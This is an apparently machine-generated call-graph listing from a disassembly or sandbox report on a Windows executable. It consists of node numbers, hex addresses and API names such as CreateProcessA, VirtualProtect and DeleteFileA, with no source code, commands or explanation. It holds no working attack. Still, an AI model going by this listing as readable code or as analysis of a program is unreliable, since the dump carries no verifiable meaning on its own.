5443->5427 6478 405ad4 6479 405adc 6478->6479 6482 405ae4 6478->6482 6480 405ae2 6479->6480 6481 405aeb 6479->6481 6485 405a4c 6480->6485 6483 405940 19 API calls 6481->6483 6483->6482 6486 405a54 6485->6486 6487 405a6e 6486->6487 6488 403154 4 API calls 6486->6488 6489 405a73 6487->6489 6490 405a8a 6487->6490 6488->6486 6492 405940 19 API calls 6489->6492 6491 403154 4 API calls 6490->6491 6494 405a8f 6491->6494 6493 405a86 6492->6493 6496 403154 4 API calls 6493->6496 6495 4059b0 33 API calls 6494->6495 6495->6493 6497 405ab8 6496->6497 6498 403154 4 API calls 6497->6498 6499 405ac6 6498->6499 6499->6482 5911 40a9de 5912 40aa03 5911->5912 5913 407918 InterlockedExchange 5912->5913 5914 40aa2d 5913->5914 5915 409ae8 18 API calls 5914->5915 5916 40aa3d 5914->5916 5915->5916 5921 4076ac SetEndOfFile 5916->5921 5918 40aa59 5919 4025ac 4 API calls 5918->5919 5920 40aa90 5919->5920 5922 4076c3 5921->5922 5923 4076bc 5921->5923 5922->5918 5924 40748c 35 API calls 5923->5924 5924->5922 6842 402be9 RaiseException 6843 402c04 6842->6843 6510 402af2 6511 402afe 6510->6511 6514 402ed0 6511->6514 6515 403154 4 API calls 6514->6515 6517 402ee0 6515->6517 6516 402b03 6517->6516 6519 402b0c 6517->6519 6520 402b25 6519->6520 6521 402b15 RaiseException 6519->6521 6520->6516 6521->6520 5449 40a5f8 5492 4030dc 5449->5492 5451 40a60e 5495 4042e8 5451->5495 5453 40a613 5498 40457c GetModuleHandleA GetProcAddress 5453->5498 5457 40a61d 5506 4065c8 5457->5506 5459 40a622 5515 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5459->5515 5469 40a665 5537 406c2c 5469->5537 5470 4031e8 18 API calls 5471 40a683 5470->5471 5551 4074e0 5471->5551 5477 407918 InterlockedExchange 5480 40a6d2 5477->5480 5478 40a710 5571 4074a0 5478->5571 5480->5478 5608 409ae8 5480->5608 5481 40a751 5575 407a28 5481->5575 5482 40a736 5482->5481 5483 409ae8 18 API calls 5482->5483 5483->5481 5485 40a776 5585 408b08 5485->5585 5489 40a7bc 5490 408b08 35 API calls 5489->5490 5491 40a7f5 5489->5491 5490->5489 5618 403094 5492->5618 5494 4030e1 GetModuleHandleA GetCommandLineA 5494->5451 5496 403154 4 API calls 5495->5496 5497 404323 5495->5497 5496->5497 5497->5453 5499 404598 5498->5499 5500 40459f GetProcAddress 5498->5500 5499->5500 5501 4045b5 GetProcAddress 5500->5501 5502 4045ae 5500->5502 5503 4045c4 SetProcessDEPPolicy 5501->5503 5504 4045c8 5501->5504 5502->5501 5503->5504 5505 404624 6F551CD0 5504->5505 5505->5457 5619 405ca8 5506->5619 5516 4090f7 5515->5516 5703 406fa0 SetErrorMode 5516->5703 5519 407284 19 API calls 5520 409127 5519->5520 5521 403198 4 API calls 5520->5521 5522 40913c 5521->5522 5523 409b78 GetSystemInfo VirtualQuery 5522->5523 5524 409c2c 5523->5524 5527 409ba2 5523->5527 5529 409768 5524->5529 5525 409c0d VirtualQuery 5525->5524 5525->5527 5526 409bcc VirtualProtect 5526->5527 5527->5524 5527->5525 5527->5526 5528 409bfb VirtualProtect 5527->5528 5528->5525 5709 406bd0 GetCommandLineA 5529->5709 5531 409850 5533 4031b8 4 API calls 5531->5533 5532 406c2c 20 API calls 5536 409785 5532->5536 5534 40986a 5533->5534 5534->5469 5601 409c88 5534->5601 5535 403454 18 API calls 5535->5536 5536->5531 5536->5532 5536->5535 5538 406c53 GetModuleFileNameA 5537->5538 5539 406c77 GetCommandLineA 5537->5539 5540 403278 18 API calls 5538->5540 5547 406c7c 5539->5547 5541 406c75 5540->5541 5545 406ca4 5541->5545 5542 406c81 5543 403198 4 API calls 5542->5543 5546 406c89 5543->5546 5544 406af0 18 API calls 5544->5547 5548 403198 4 API calls 5545->5548 5549 40322c 4 API calls 5546->5549 5547->5542 5547->5544 5547->5546 5550 406cb9 5548->5550 5549->5545 5550->5470 5552 4074ea 5551->5552 5716 407576 5552->5716 5719 407578 5552->5719 5553 407516 5554 40752a 5553->5554 5555 40748c 35 API calls 5553->5555 5558 409c34 FindResourceA 5554->5558 5555->5554 5559 409c49 5558->5559 5560 409c4e SizeofResource 5558->5560 5561 409ae8 18 API calls 5559->5561 5562 409c60 LoadResource 5560->5562 5563 409c5b 5560->5563 5561->5560 5565 409c73 LockResource 5562->5565 5566 409c6e 5562->5566 5564 409ae8 18 API calls 5563->5564 5564->5562 5568 409c84 5565->5568 5569 409c7f 5565->5569 5567 409ae8 18 API calls 5566->5567 5567->5565 5568->5477 5568->5480 5570 409ae8 18 API calls 5569->5570 5570->5568 5572 4074b4 5571->5572 5573 4074c4 5572->5573 5574 4073ec 34 API calls 5572->5574 5573->5482 5574->5573 5576 407a35 5575->5576 5577 405890 18 API calls 5576->5577 5578 407a89 5576->5578 5577->5578 5579 407918 InterlockedExchange 5578->5579 5580 407a9b 5579->5580 5581 405890 18 API calls 5580->5581 5582 407ab1 5580->5582 5581->5582 5583 405890 18 API calls 5582->5583 5584 407af4 5582->5584 5583->5584 5584->5485 5590 408b82 5585->5590 5597 408b39 5585->5597 5586 408bcd 5722 407cb8 5586->5722 5587 407cb8 35 API calls 5587->5597 5589 408be4 5593 4031b8 4 API calls 5589->5593 5590->5586 5592 4034f0 18 API calls 5590->5592 5598 4031e8 18 API calls 5590->5598 5599 403420 18 API calls 5590->5599 5600 407cb8 35 API calls 5590->5600 5591 4034f0 18 API calls 5591->5597 5592->5590 5596 408bfe 5593->5596 5594 403420 18 API calls 5594->5597 5595 4031e8 18 API calls 5595->5597 5615 404c20 5596->5615 5597->5587 5597->5590 5597->5591 5597->5594 5597->5595 5598->5590 5599->5590 5600->5590 5602 40322c 4 API calls 5601->5602 5603 409cab 5602->5603 5604 409cba MessageBoxA 5603->5604 5605 409ccf 5604->5605 5606 403198 4 API calls 5605->5606 5607 409cd7 5606->5607 5607->5469 5609 409af1 5608->5609 5610 409b09 5608->5610 5611 405890 18 API calls 5609->5611 5612 405890 18 API calls 5610->5612 5613 409b03 5611->5613 5614 409b1a 5612->5614 5613->5478 5614->5478 5744 402594 5615->5744 5617 404c2b 5617->5489 5618->5494 5620 405940 19 API calls 5619->5620 5621 405cb9 5620->5621 5622 405280 GetSystemDefaultLCID 5621->5622 5626 4052b6 5622->5626 5623 40520c 19 API calls 5623->5626 5624 4031e8 18 API calls 5624->5626 5625 404cdc 19 API calls 5625->5626 5626->5623 5626->5624 5626->5625 5627 405318 5626->5627 5628 4031e8 18 API calls 5627->5628 5629 404cdc 19 API calls 5627->5629 5630 40520c 19 API calls 5627->5630 5631 40539b 5627->5631 5628->5627 5629->5627 5630->5627 5632 4031b8 4 API calls 5631->5632 5633 4053b5 5632->5633 5634 4053c4 GetSystemDefaultLCID 5633->5634 5691 40520c GetLocaleInfoA 5634->5691 5637 4031e8 18 API calls 5638 405404 5637->5638 5639 40520c 19 API calls 5638->5639 5640 405419 5639->5640 5641 40520c 19 API calls 5640->5641 5642 40543d 5641->5642 5697 405258 GetLocaleInfoA 5642->5697 5645 405258 GetLocaleInfoA 5646 40546d 5645->5646 5647 40520c 19 API calls 5646->5647 5648 405487 5647->5648 5649 405258 GetLocaleInfoA 5648->5649 5650 4054a4 5649->5650 5651 40520c 19 API calls 5650->5651 5652 4054be 5651->5652 5653 4031e8 18 API calls 5652->5653 5654 4054cb 5653->5654 5655 40520c 19 API calls 5654->5655 5656 4054e0 5655->5656 5657 4031e8 18 API calls 5656->5657 5658 4054ed 5657->5658 5659 405258 GetLocaleInfoA 5658->5659 5660 4054fb 5659->5660 5661 40520c 19 API calls 5660->5661 5662 405515 5661->5662 5663 4031e8 18 API calls 5662->5663 5664 405522 5663->5664 5665 40520c 19 API calls 5664->5665 5666 405537 5665->5666 5667 4031e8 18 API calls 5666->5667 5668 405544 5667->5668 5669 40520c 19 API calls 5668->5669 5670 405559 5669->5670 5671 405576 5670->5671 5672 405567 5670->5672 5674 40322c 4 API calls 5671->5674 5699 40322c 5672->5699 5675 405574 5674->5675 5676 40520c 19 API calls 5675->5676 5677 405598 5676->5677 5678 4055b5 5677->5678 5679 4055a6 5677->5679 5680 403198 4 API calls 5678->5680 5681 40322c 4 API calls 5679->5681 5682 4055b3 5680->5682 5681->5682 5683 4033b4 18 API calls 5682->5683 5684 4055d7 5683->5684 5685 4033b4 18 API calls 5684->5685 5686 4055f1 5685->5686 5687 4031b8 4 API calls 5686->5687 5688 40560b 5687->5688 5689 405cf4 GetVersionExA 5688->5689 5690 405d0b 5689->5690 5690->5459 5692 405233 5691->5692 5693 405245 5691->5693 5694 403278 18 API calls 5692->5694 5695 40322c 4 API calls 5693->5695 5696 405243 5694->5696 5695->5696 5696->5637 5698 405274 5697->5698 5698->5645 5701 403230 5699->5701 5700 403252 5700->5675 5701->5700 5702 4025ac 4 API calls 5701->5702 5702->5700 5707 403414 5703->5707 5706 406fee 5706->5519 5708 403418 LoadLibraryA 5707->5708 5708->5706 5710 406af0 18 API calls 5709->5710 5711 406bf3 5710->5711 5712 406c05 5711->5712 5713 406af0 18 API calls 5711->5713 5714 403198 4 API calls 5712->5714 5713->5711 5715 406c1a 5714->5715 5715->5536 5717 407578 5716->5717 5718 4075b7 CreateFileA 5717->5718 5718->5553 5720 403414 5719->5720 5721 4075b7 CreateFileA 5720->5721 5721->5553 5723 407cd3 5722->5723 5725 407cc8 5722->5725 5728 407c5c 5723->5728 5725->5589 5727 405890 18 API calls 5727->5725 5729 407c70 5728->5729 5730 407caf 5728->5730 5729->5730 5732 407bac 5729->5732 5730->5725 5730->5727 5733 407bb7 5732->5733 5734 407bc8 5732->5734 5736 405890 18 API calls 5733->5736 5735 4074a0 34 API calls 5734->5735 5737 407bdc 5735->5737 5736->5734 5738 4074a0 34 API calls 5737->5738 5739 407bfd 5738->5739 5740 407918 InterlockedExchange 5739->5740 5741 407c12 5740->5741 5742 407c28 5741->5742 5743 405890 18 API calls 5741->5743 5742->5729 5743->5742 5745 402598 5744->5745 5747 4025a2 5744->5747 5750 401fd4 5745->5750 5746 40259e 5746->5747 5748 403154 4 API calls 5746->5748 5747->5617 5747->5747 5748->5747 5751 401fe8 5750->5751 5752 401fed 5750->5752 5761 401918 RtlInitializeCriticalSection 5751->5761 5754 402012 RtlEnterCriticalSection 5752->5754 5755 40201c 5752->5755 5760 401ff1 5752->5760 5754->5755 5755->5760 5768 401ee0 5755->5768 5758 402147 5758->5746 5759 40213d RtlLeaveCriticalSection 5759->5758 5760->5746 5762 40193c RtlEnterCriticalSection 5761->5762 5763 401946 5761->5763 5762->5763 5764 401964 LocalAlloc 5763->5764 5765 40197e 5764->5765 5766 4019c3 RtlLeaveCriticalSection 5765->5766 5767 4019cd 5765->5767 5766->5767 5767->5752 5771 401ef0 5768->5771 5769 401f1c 5773 401f40 5769->5773 5779 401d00 5769->5779 5771->5769 5771->5773 5774 401e58 5771->5774 5773->5758 5773->5759 5783 4016d8 5774->5783 5777 401e75 5777->5771 5780 401d4e 5779->5780 5781 401d1e 5779->5781 5780->5781 5852 401c68 5780->5852 5781->5773 5786 4016f4 5783->5786 5785 4016fe 5808 4015c4 5785->5808 5786->5785 5788 40175b 5786->5788 5790 40174f 5786->5790 5800 401430 5786->5800 5812 40132c 5786->5812 5788->5777 5793 401dcc 5788->5793 5816 40150c 5790->5816 5791 40170a 5791->5788 5826 401d80 5793->5826 5796 40132c LocalAlloc 5797 401df0 5796->5797 5799 401df8 5797->5799 5830 401b44 5797->5830 5799->5777 5801 40143f VirtualAlloc 5800->5801 5803 40146c 5801->5803 5804 40148f 5801->5804 5820 4012e4 5803->5820 5804->5786 5807 40147c VirtualFree 5807->5804 5810 40160a 5808->5810 5809 40163a 5809->5791 5810->5809 5811 401626 VirtualAlloc 5810->5811 5811->5809 5811->5810 5813 401348 5812->5813 5814 4012e4 LocalAlloc 5813->5814 5815 40138f 5814->5815 5815->5786 5819 40153b 5816->5819 5817 401594 5817->5788 5818 401568 VirtualFree 5818->5819 5819->5817 5819->5818 5823 40128c 5820->5823 5824 401298 LocalAlloc 5823->5824 5825 4012aa 5823->5825 5824->5825 5825->5804 5825->5807 5827 401d89 5826->5827 5829 401d92 5826->5829 5827->5829 5835 401b74 5827->5835 5829->5796 5831 401b61 5830->5831 5832 401b52 5830->5832 5831->5799 5833 401d00 9 API calls 5832->5833 5834 401b5f 5833->5834 5834->5799 5838 40215c 5835->5838 5837 401b95 5837->5829 5839 40217a 5838->5839 5840 402175 5838->5840 5842 4021ab RtlEnterCriticalSection 5839->5842 5843 40217e 5839->5843 5850 4021b5 5839->5850 5841 401918 4 API calls 5840->5841 5841->5839 5842->5850 5843->5837 5844 4021c1 5846 4022e3 RtlLeaveCriticalSection 5844->5846 5847 4022ed 5844->5847 5845 402244 5845->5843 5848 401d80 7 API calls 5845->5848 5846->5847 5847->5837 5848->5843 5849 402270 5849->5844 5851 401d00 7 API calls 5849->5851 5850->5844 5850->5845 5850->5849 5851->5844 5853 401c7a 5852->5853 5854 401c9d 5853->5854 5855 401caf 5853->5855 5865 40188c 5854->5865 5857 40188c 3 API calls 5855->5857 5858 401cad 5857->5858 5859 401b44 9 API calls 5858->5859 5864 401cc5 5858->5864 5860 401cd4 5859->5860 5861 401cee 5860->5861 5875 401b98 5860->5875 5880 4013a0 5861->5880 5864->5781 5866 4018b2 5865->5866 5874 40190b 5865->5874 5884 401658 5866->5884 5869 40132c LocalAlloc 5870 4018cf 5869->5870 5871 40150c VirtualFree 5870->5871 5872 4018e6 5870->5872 5871->5872 5873 4013a0 LocalAlloc 5872->5873 5872->5874 5873->5874 5874->5858 5876 401bab 5875->5876 5877 401b9d 5875->5877 5876->5861 5878 401b74 9 API calls 5877->5878 5879 401baa 5878->5879 5879->5861 5881 4013ab 5880->5881 5882 4013c6 5881->5882 5883 4012e4 LocalAlloc 5881->5883 5882->5864 5883->5882 5886 40168f 5884->5886 5885 4016cf 5885->5869 5886->5885 5887 4016a9 VirtualFree 5886->5887 5887->5886 6844 402dfa 6845 402e26 6844->6845 6846 402e0d 6844->6846 6848 402ba4 6846->6848 6849 402bc9 6848->6849 6850 402bad 6848->6850 6849->6845 6851 402bb5 RaiseException 6850->6851 6851->6849 6852 4075fa GetFileSize 6853 407626 6852->6853 6854 407616 GetLastError 6852->6854 6854->6853 6855 40761f 6854->6855 6856 40748c 35 API calls 6855->6856 6856->6853 6857 406ffb 6858 407008 SetErrorMode 6857->6858 6526 403a80 CloseHandle 6527 403a90 6526->6527 6528 403a91 GetLastError 6526->6528 6529 404283 6530 4042c3 6529->6530 6531 403154 4 API calls 6530->6531 6532 404323 6531->6532 6859 404185 6860 4041ff 6859->6860 6861 4041cc 6860->6861 6862 403154 4 API calls 6860->6862 6863 404323 6862->6863 6533 403e87 6534 403e4c 6533->6534 6535 403e62 6534->6535 6536 403e7b 6534->6536 6540 403e67 6534->6540 6542 403cc8 6535->6542 6538 402674 4 API calls 6536->6538 6539 403e78 6538->6539 6540->6539 6546 402674 6540->6546 6543 403cd6 6542->6543 6544 402674 4 API calls 6543->6544 6545 403ceb 6543->6545 6544->6545 6545->6540 6547 403154 4 API calls 6546->6547 6548 40267a 6547->6548 6548->6539 6557 407e90 6558 407eb8 VirtualFree 6557->6558 6559 407e9d 6558->6559 6562 403e95 6563 403e4c 6562->6563 6564 403e62 6563->6564 6565 403e7b 6563->6565 6569 403e67 6563->6569 6566 403cc8 4 API calls 6564->6566 6567 402674 4 API calls 6565->6567 6566->6569 6568 403e78 6567->6568 6569->6568 6570 402674 4 API calls 6569->6570 6570->6568 6571 40ac97 6580 4096fc 6571->6580 6574 402f24 5 API calls 6575 40aca1 6574->6575 6576 403198 4 API calls 6575->6576 6577 40acc0 6576->6577 6578 403198 4 API calls 6577->6578 6579 40acc8 6578->6579 6589 4056ac 6580->6589 6582 409717 6583 409745 6582->6583 6595 40720c 6582->6595 6585 403198 4 API calls 6583->6585 6587 40975a 6585->6587 6586 409735 6588 40973d MessageBoxA 6586->6588 6587->6574 6587->6575 6588->6583 6590 403154 4 API calls 6589->6590 6591 4056b1 6590->6591 6592 4056c9 6591->6592 6593 403154 4 API calls 6591->6593 6592->6582 6594 4056bf 6593->6594 6594->6582 6596 4056ac 4 API calls 6595->6596 6597 40721b 6596->6597 6598 407221 6597->6598 6599 40722f 6597->6599 6600 40322c 4 API calls 6598->6600 6602 40724b 6599->6602 6603 40723f 6599->6603 6601 40722d 6600->6601 6601->6586 6613 4032b8 6602->6613 6606 4071d0 6603->6606 6607 40322c 4 API calls 6606->6607 6608 4071df 6607->6608 6609 4071fc 6608->6609 6610 406950 CharPrevA 6608->6610 6609->6601 6611 4071eb 6610->6611 6611->6609 6612 4032fc 18 API calls 6611->6612 6612->6609 6614 403278 18 API calls 6613->6614 6615 4032c2 6614->6615 6615->6601 6616 403a97 6617 403aac 6616->6617 6618 403ab2 6617->6618 6619 403bbc GetStdHandle 6617->6619 6620 403b0e CreateFileA 6617->6620 6621 403c17 GetLastError 6619->6621 6633 403bba 6619->6633 6620->6621 6622 403b2c 6620->6622 6621->6618 6624 403b3b GetFileSize 6622->6624 6622->6633 6624->6621 6626 403b4e SetFilePointer 6624->6626 6625 403be7 GetFileType 6625->6618 6628 403c02 CloseHandle 6625->6628 6626->6621 6629 403b6a ReadFile 6626->6629 6628->6618 6629->6621 6630 403b8c 6629->6630 6631 403b9f SetFilePointer 6630->6631 6630->6633 6631->6621 6632 403bb0 SetEndOfFile 6631->6632 6632->6621 6632->6633 6633->6618 6633->6625 6638 40aaa2 6639 40aad2 6638->6639 6640 40aadc CreateWindowExA SetWindowLongA 6639->6640 6641 405194 33 API calls 6640->6641 6642 40ab5f 6641->6642 6643 4032fc 18 API calls 6642->6643 6644 40ab6d 6643->6644 6645 4032fc 18 API calls 6644->6645 6646 40ab7a 6645->6646 6647 406b7c 19 API calls 6646->6647 6648 40ab86 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab8f 6649->6650 6651 4099ec 43 API calls 6650->6651 6652 40aba1 6651->6652 6653 4098cc 19 API calls 6652->6653 6654 40abb4 6652->6654 6653->6654 6655 40abed 6654->6655 6656 4094d8 9 API calls 6654->6656 6657 40ac06 6655->6657 6660 40ac00 RemoveDirectoryA 6655->6660 6656->6655 6658 40ac1a 6657->6658 6659 40ac0f DestroyWindow 6657->6659 6661 40ac42 6658->6661 6662 40357c 4 API calls 6658->6662 6659->6658 6660->6657 6663 40ac38 6662->6663 6664 4025ac 4 API calls 6663->6664 6664->6661 6876 405ba2 6878 405ba4 6876->6878 6877 405be0 6881 405940 19 API calls 6877->6881 6878->6877 6879 405bf7 6878->6879 6880 405bda 6878->6880 6885 404cdc 19 API calls 6879->6885 6880->6877 6882 405c4c 6880->6882 6883 405bf3 6881->6883 6884 4059b0 33 API calls 6882->6884 6886 403198 4 API calls 6883->6886 6884->6883 6887 405c20 6885->6887 6889 405c86 6886->6889 6888 4059b0 33 API calls 6887->6888 6888->6883 6890 408da4 6891 408dc8 6890->6891 6892 408c80 18 API calls 6891->6892 6893 408dd1 6892->6893 6665 402caa 6666 403154 4 API calls 6665->6666 6667 402caf 6666->6667 6908 4011aa 6909 4011ac GetStdHandle 6908->6909 6668 4028ac 6669 402594 18 API calls 6668->6669 6670 4028b6 6669->6670 4980 40aab4 4981 40aab8 SetLastError 4980->4981 5012 409648 GetLastError 4981->5012 4984 40aad2 4986 40aadc CreateWindowExA SetWindowLongA 4984->4986 5025 405194 4986->5025 4990 40ab6d 4991 4032fc 18 API calls 4990->4991 4992 40ab7a 4991->4992 5042 406b7c GetCommandLineA 4992->5042 4995 4032fc 18 API calls 4996 40ab8f 4995->4996 5047 4099ec 4996->5047 4998 40aba1 5000 40abb4 4998->5000 5068 4098cc 4998->5068 5001 40abd4 5000->5001 5002 40abed 5000->5002 5074 4094d8 5001->5074 5004 40ac06 5002->5004 5007 40ac00 RemoveDirectoryA 5002->5007 5005 40ac1a 5004->5005 5006 40ac0f DestroyWindow 5004->5006 5008 40ac42 5005->5008 5082 40357c 5005->5082 5006->5005 5007->5004 5010 40ac38 5095 4025ac 5010->5095 5099 404c94 5012->5099 5020 4096c3 5114 4031b8 5020->5114 5026 4051a8 33 API calls 5025->5026 5027 4051a3 5026->5027 5028 4032fc 5027->5028 5029 403300 5028->5029 5030 40333f 5028->5030 5031 4031e8 5029->5031 5032 40330a 5029->5032 5030->4990 5038 403254 18 API calls 5031->5038 5039 4031fc 5031->5039 5033 403334 5032->5033 5034 40331d 5032->5034 5035 4034f0 18 API calls 5033->5035 5275 4034f0 5034->5275 5041 403322 5035->5041 5036 403228 5036->4990 5038->5039 5039->5036 5040 4025ac 4 API calls 5039->5040 5040->5036 5041->4990 5301 406af0 5042->5301 5044 406ba1 5045 403198 4 API calls 5044->5045 5046 406bbf 5045->5046 5046->4995 5315 4033b4 5047->5315 5049 409a27 5050 409a59 CreateProcessA 5049->5050 5051 409a65 5050->5051 5052 409a6c CloseHandle 5050->5052 5053 409648 35 API calls 5051->5053 5054 409a75 5052->5054 5053->5052 5055 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5054->5055 5056 409a7a MsgWaitForMultipleObjects 5055->5056 5056->5054 5057 409a91 5056->5057 5058 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5057->5058 5059 409a96 GetExitCodeProcess CloseHandle 5058->5059 5060 409ab6 5059->5060 5061 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5060->5061 5062 409abe 5061->5062 5062->4998 5063 402f24 5064 403154 4 API calls 5063->5064 5065 402f29 5064->5065 5321 402bcc 5065->5321 5067 402f51 5067->5067 5069 40990e 5068->5069 5070 4098d4 5068->5070 5069->5000 5070->5069 5071 403420 18 API calls 5070->5071 5072 409908 5071->5072 5324 408e80 5072->5324 5075 409532 5074->5075 5079 4094eb 5074->5079 5075->5002 5076 4094f3 Sleep 5076->5079 5077 409503 Sleep 5077->5079 5079->5075 5079->5076 5079->5077 5080 40951a GetLastError 5079->5080 5347 408fbc 5079->5347 5080->5075 5081 409524 GetLastError 5080->5081 5081->5075 5081->5079 5085 403591 5082->5085 5091 4035a0 5082->5091 5083 4035b1 5086 403198 4 API calls 5083->5086 5084 4035b8 5087 4031b8 4 API calls 5084->5087 5088 4035d0 5085->5088 5089 40359b 5085->5089 5090 4035b6 5085->5090 5086->5090 5087->5090 5088->5090 5093 40357c 4 API calls 5088->5093 5089->5091 5092 4035ec 5089->5092 5090->5010 5091->5083 5091->5084 5092->5090 5364 403554 5092->5364 5093->5088 5096 4025b0 5095->5096 5097 4025ba 5095->5097 5096->5097 5098 403154 4 API calls 5096->5098 5097->5008 5097->5097 5098->5097 5122 4051a8 5099->5122 5102 407284 FormatMessageA 5103 4072aa 5102->5103 5104 403278 18 API calls 5103->5104 5105 4072c7 5104->5105 5106 408da8 5105->5106 5107 408dc8 5106->5107 5265 408c80 5107->5265 5110 405890 5111 405897 5110->5111 5112 4031e8 18 API calls 5111->5112 5113 4058af 5112->5113 5113->5020 5116 4031be 5114->5116 5115 4031e3 5118 403198 5115->5118 5116->5115 5117 4025ac 4 API calls 5116->5117 5117->5116 5119 4031b7 5118->5119 5120 40319e 5118->5120 5119->4984 5119->5063 5120->5119 5121 4025ac 4 API calls 5120->5121 5121->5119 5123 4051c5 5122->5123 5130 404e58 5123->5130 5126 4051f1 5135 403278 5126->5135 5133 404e73 5130->5133 5131 404e85 5131->5126 5140 404be4 5131->5140 5133->5131 5143 404f7a 5133->5143 5150 404e4c 5133->5150 5136 403254 18 API calls 5135->5136 5137 403288 5136->5137 5138 403198 4 API calls 5137->5138 5139 4032a0 5138->5139 5139->5102 5257 405940 5140->5257 5142 404bf5 5142->5126 5144 404f8b 5143->5144 5148 404fd9 5143->5148 5147 40505f 5144->5147 5144->5148 5146 404ff7 5146->5133 5147->5146 5157 404e38 5147->5157 5148->5146 5153 404df4 5148->5153 5151 403198 4 API calls 5150->5151 5152 404e56 5151->5152 5152->5133 5154 404e02 5153->5154 5160 404bfc 5154->5160 5156 404e30 5156->5148 5187 4039a4 5157->5187 5163 4059b0 5160->5163 5162 404c15 5162->5156 5164 4059be 5163->5164 5173 404cdc LoadStringA 5164->5173 5167 405194 33 API calls 5168 4059f6 5167->5168 5176 4031e8 5168->5176 5171 4031b8 4 API calls 5172 405a1b 5171->5172 5172->5162 5174 403278 18 API calls 5173->5174 5175 404d09 5174->5175 5175->5167 5177 4031ec 5176->5177 5180 4031fc 5176->5180 5177->5180 5182 403254 5177->5182 5178 403228 5178->5171 5180->5178 5181 4025ac 4 API calls 5180->5181 5181->5178 5183 403274 5182->5183 5184 403258 5182->5184 5183->5180 5185 402594 18 API calls 5184->5185 5186 403261 5185->5186 5186->5180 5188 4039ab 5187->5188 5193 4038b4 5188->5193 5190 4039cb 5191 403198 4 API calls 5190->5191 5192 4039d2 5191->5192 5192->5146 5194 4038d5 5193->5194 5195 4038c8 5193->5195 5197 403934 5194->5197 5198 4038db 5194->5198 5221 403780 5195->5221 5199 403993 5197->5199 5200 40393b 5197->5200 5201 4038e1 5198->5201 5202 4038ee 5198->5202 5203 4037f4 3 API calls 5199->5203 5204 403941 5200->5204 5205 40394b 5200->5205 5228 403894 5201->5228 5207 403894 6 API calls 5202->5207 5210 4038d0 5203->5210 5243 403864 5204->5243 5209 4037f4 3 API calls 5205->5209 5211 4038fc 5207->5211 5212 40395d 5209->5212 5210->5190 5233 4037f4 5211->5233 5215 403864 23 API calls 5212->5215 5214 403917 5239 40374c 5214->5239 5216 403976 5215->5216 5219 40374c VariantClear 5216->5219 5218 40392c 5218->5190 5220 40398b 5219->5220 5220->5190 5222 4037f0 5221->5222 5224 403744 5221->5224 5222->5210 5223 403793 VariantClear 5223->5224 5224->5221 5224->5223 5225 4037ab 5224->5225 5226 403198 4 API calls 5224->5226 5227 4037dc VariantCopyInd 5224->5227 5225->5210 5226->5224 5227->5222 5227->5224 5248 4036b8 5228->5248 5231 40374c VariantClear 5232 4038a9 5231->5232 5232->5210 5234 403845 VariantChangeTypeEx 5233->5234 5235 40380a VariantChangeTypeEx 5233->5235 5238 403832 5234->5238 5236 403826 5235->5236 5237 40374c VariantClear 5236->5237 5237->5238 5238->5214 5240 403759 5239->5240 5241 403766 5239->5241 5240->5241 5242 403779 VariantClear 5240->5242 5241->5218 5242->5218 5254 40369c SysStringLen 5243->5254 5246 40374c VariantClear 5247 403882 5246->5247 5247->5210 5249 4036cb 5248->5249 5250 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5249->5250 5251 4036db 5249->5251 5252 40372e 5250->5252 5253 4036ed MultiByteToWideChar SysAllocStringLen 5251->5253 5252->5231 5253->5252 5255 403610 21 API calls 5254->5255 5256 4036b3 5255->5256 5256->5246 5258 40594c 5257->5258 5259 404cdc 19 API calls 5258->5259 5260 405972 5259->5260 5261 4031e8 18 API calls 5260->5261 5262 40597d 5261->5262 5263 403198 4 API calls 5262->5263 5264 405992 5263->5264 5264->5142 5266 403198 4 API calls 5265->5266 5268 408cb1 5265->5268 5266->5268 5267 4031b8 4 API calls 5269 408d69 5267->5269 5270 408cc8 5268->5270 5271 403278 18 API calls 5268->5271 5273 408cdc 5268->5273 5274 4032fc 18 API calls 5268->5274 5269->5110 5272 4032fc 18 API calls 5270->5272 5271->5268 5272->5273 5273->5267 5274->5268 5276 4034fd 5275->5276 5283 40352d 5275->5283 5278 403526 5276->5278 5281 403509 5276->5281 5277 403198 4 API calls 5280 403517 5277->5280 5279 403254 18 API calls 5278->5279 5279->5283 5280->5041 5284 4025c4 5281->5284 5283->5277 5286 4025ca 5284->5286 5285 4025dc 5285->5280 5285->5285 5286->5285 5288 403154 5286->5288 5289 403164 5288->5289 5290 40318c TlsGetValue 5288->5290 5289->5285 5291 403196 5290->5291 5292 40316f 5290->5292 5291->5285 5296 40310c 5292->5296 5294 403174 TlsGetValue 5295 403184 5294->5295 5295->5285 5297 403120 LocalAlloc 5296->5297 5298 403116 5296->5298 5299 40313e TlsSetValue 5297->5299 5300 403132 5297->5300 5298->5297 5299->5300 5300->5294 5302 406b1c 5301->5302 5303 403278 18 API calls 5302->5303 5304 406b29 5303->5304 5311 403420 5304->5311 5306 406b31 5307 4031e8 18 API calls 5306->5307 5308 406b49 5307->5308 5309 403198 4 API calls 5308->5309 5310 406b6b 5309->5310 5310->5044 5312 403426 5311->5312 5314 403437 5311->5314 5313 403254 18 API calls 5312->5313 5312->5314 5313->5314 5314->5306 5316 4033bc 5315->5316 5317 403254 18 API calls 5316->5317 5318 4033cf 5317->5318 5319 4031e8 18 API calls 5318->5319 5320 4033f7 5319->5320 5322 402bd5 RaiseException 5321->5322 5323 402be6 5321->5323 5322->5323 5323->5067 5325 408e8e 5324->5325 5327 408ea6 5325->5327 5337 408e18 5325->5337 5328 408e18 18 API calls 5327->5328 5329 408eca 5327->5329 5328->5329 5340 407918 5329->5340 5331 408ee5 5332 408e18 18 API calls 5331->5332 5334 408ef8 5331->5334 5332->5334 5333 408e18 18 API calls 5333->5334 5334->5333 5335 403278 18 API calls 5334->5335 5336 408f27 5334->5336 5335->5334 5336->5069 5338 405890 18 API calls 5337->5338 5339 408e29 5338->5339 5339->5327 5343 4078c4 5340->5343 5344 4078d6 5343->5344 5345 4078e7 5343->5345 5346 4078db InterlockedExchange 5344->5346 5345->5331 5346->5345 5355 408f70 5347->5355 5349 408fd2 5350 408fd6 5349->5350 5351 408ff2 DeleteFileA GetLastError 5349->5351 5350->5079 5352 409010 5351->5352 5361 408fac 5352->5361 5356 408f7a 5355->5356 5357 408f7e 5355->5357 5356->5349 5358 408fa0 SetLastError 5357->5358 5359 408f87 